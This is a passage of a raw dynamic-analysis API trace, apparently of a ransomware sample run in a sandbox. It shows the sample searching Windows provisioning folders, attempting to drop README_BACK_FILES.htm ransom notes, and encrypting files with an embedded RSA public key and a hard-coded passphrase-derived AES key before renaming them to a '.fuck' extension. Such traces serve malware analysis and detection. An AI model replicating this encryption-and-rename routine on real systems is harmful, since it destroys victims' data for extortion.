"c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.525] AreFileApisANSI () returned 1 [0237.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.525] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.526] GetLastError () returned 0x5 [0237.526] GetLastError () returned 0x5 [0237.526] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.526] FindClose (in: hFindFile=0x2846220 | out: hFindFile=0x2846220) returned 1 [0237.526] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\readme_back_files.htm")) returned 0xffffffff [0237.527] AreFileApisANSI () returned 1 [0237.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.528] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.529] GetLastError () returned 0x5 [0237.529] GetLastError () returned 0x5 [0237.529] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.529] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845fa0 [0237.530] FindNextFileA (in: hFindFile=0x2845fa0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.530] FindNextFileA (in: hFindFile=0x2845fa0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.530] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.531] GetLastError () returned 0x5 [0237.531] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml")) returned 0x20 [0237.531] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.531] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.531] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.532] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.532] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2844b28) returned 1 [0237.535] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.535] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.535] CryptHashData (hHash=0x28461a0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.535] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x28461a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846320) returned 1 [0237.535] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.535] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.535] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2844880) returned 1 [0237.535] CryptImportPublicKeyInfo (in: hCryptProv=0x2844880, dwCertEncodingType=0x1, pInfo=0x284efe8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f018*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f020*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2846360) returned 1 [0237.536] CryptEncrypt (in: hKey=0x2846360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.536] CryptEncrypt (in: hKey=0x2846360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844bb0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2844bb0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.536] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844bb0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.536] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2763998, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.536] CryptEncrypt (in: hKey=0x2846320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2763998*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2763998*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.536] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.536] CloseHandle (hObject=0xffffffff) returned 1 [0237.536] CloseHandle (hObject=0xffffffff) returned 1 [0237.536] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.537] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.537] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg")) returned 0 [0237.537] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.fuck")) returned 0 [0237.538] CryptDestroyHash (hHash=0x28461a0) returned 1 [0237.538] CryptDestroyKey (hKey=0x2846320) returned 1 [0237.538] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.538] FindNextFileA (in: hFindFile=0x2845fa0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.538] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.538] GetLastError () returned 0x5 [0237.538] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml")) returned 0x20 [0237.538] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.538] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.539] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.539] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.539] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2844b28) returned 1 [0237.542] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.542] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.542] CryptHashData (hHash=0x28460e0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.542] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x28460e0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846220) returned 1 [0237.542] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.542] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.542] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2845980) returned 1 [0237.543] CryptImportPublicKeyInfo (in: hCryptProv=0x2845980, dwCertEncodingType=0x1, pInfo=0x284f738*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f768*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f770*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2846320) returned 1 [0237.543] CryptEncrypt (in: hKey=0x2846320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.543] CryptEncrypt (in: hKey=0x2846320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28454b8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28454b8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.543] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28454b8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.543] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2763998, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.543] CryptEncrypt (in: hKey=0x2846220, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2763998*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2763998*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.544] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.544] CloseHandle (hObject=0xffffffff) returned 1 [0237.544] CloseHandle (hObject=0xffffffff) returned 1 [0237.544] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.544] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.545] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml.gsg")) returned 0 [0237.545] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml.fuck")) returned 0 [0237.545] CryptDestroyHash (hHash=0x28460e0) returned 1 [0237.545] CryptDestroyKey (hKey=0x2846220) returned 1 [0237.545] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.545] FindNextFileA (in: hFindFile=0x2845fa0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.546] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28460e0 [0237.546] FindNextFileA (in: hFindFile=0x28460e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.546] FindNextFileA (in: hFindFile=0x28460e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.546] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2846220 [0237.546] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.546] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.546] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.546] GetLastError () returned 0x5 [0237.546] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.548] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.548] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.549] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.549] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.549] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2844b28) returned 1 [0237.552] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.552] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.552] CryptHashData (hHash=0x28463e0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.552] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2845e60) returned 1 [0237.552] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.552] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.552] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2845540) returned 1 [0237.552] CryptImportPublicKeyInfo (in: hCryptProv=0x2845540, dwCertEncodingType=0x1, pInfo=0x284ed78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284eda8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284edb0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2846120) returned 1 [0237.553] CryptEncrypt (in: hKey=0x2846120, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.553] CryptEncrypt (in: hKey=0x2846120, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28458f8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28458f8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.553] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28458f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.553] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2763998, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.553] CryptEncrypt (in: hKey=0x2845e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2763998*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x2763998*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.553] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.553] CloseHandle (hObject=0xffffffff) returned 1 [0237.553] CloseHandle (hObject=0xffffffff) returned 1 [0237.553] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.553] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0237.554] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.554] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml"), 